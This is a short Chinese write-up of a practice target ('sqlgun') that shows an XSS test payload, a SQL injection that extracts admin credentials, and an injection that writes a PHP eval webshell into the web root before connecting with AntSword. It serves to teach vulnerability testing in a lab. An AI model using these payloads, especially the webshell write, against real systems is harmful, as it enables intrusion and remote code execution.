当前位置: 首页 > article >正文

sqlgun靶场漏洞挖掘

1.xss漏洞

搜索框输入以下代码,验证是否存在xss漏洞

<script>alert(1)</script>

OK了,存在xss漏洞

2.SQL注入

经过测试,输入框存在SQL注入漏洞

查询数据库名

查询管理员账号密码

 此处密码为MD5加密,解码内容如下

找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径

于是乎,尝试使用sql注入的方式,上传一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/www.php' #

根据设定的地址访问上传的文件 

写入成功,蚁剑连接大脑,cmd代替思考

完事🧐


http://www.kler.cn/a/302205.html

相关文章:

  • 【C++语言】多态
  • OpenHarmony的分布式服务框架介绍与实现解析
  • IT运维的365天--021 服务器上的dns设置后不起作用
  • 网关的国际化改造
  • R9000P键盘失灵解决办法
  • Halcon例程代码解读:安全环检测(附源码|图像下载链接)
  • 安泰功率放大器有哪些特点呢
  • Linux从入门到开发实战(C/C++)Day13-线程池
  • 滚雪球学SpringCloud[1.1]:Spring Cloud概述与环境搭建(入门章节)
  • QT中使用UTF-8编码
  • Linux echo命令讲解及与重定向符搭配使用方法,tail命令及日志监听方式详解
  • 从戴尔公司中国大饭店DTF大会,看科技外企如何在中国市场发展
  • Docker快速部署Apache Guacamole
  • 前端三件套(HTML,CSS,JS)查漏补缺
  • 交换两实数的整数部分
  • 【数据结构】选择题错题集
  • log4j 的参数配置
  • CUDA-中值滤波算法
  • git标签、repo如何打tag
  • 828华为云征文|基于华为云Flexus云服务器X部署Minio服务
  • 领夹麦克风哪个品牌好?大疆、西圣、博雅无线麦克风在线测评
  • 关于 Embedding 的个人粗略见解
  • cross-plateform 跨平台应用程序-05-Flutter 介绍
  • 【2024 版】最新 kali linux 入门及常用简单工具介绍(非常详细)
  • Unet改进30:添加CAA(2024最新改进方法)|上下文锚定注意模块来捕获远程上下文信息。
  • UE5 性能分析 UnrealInsights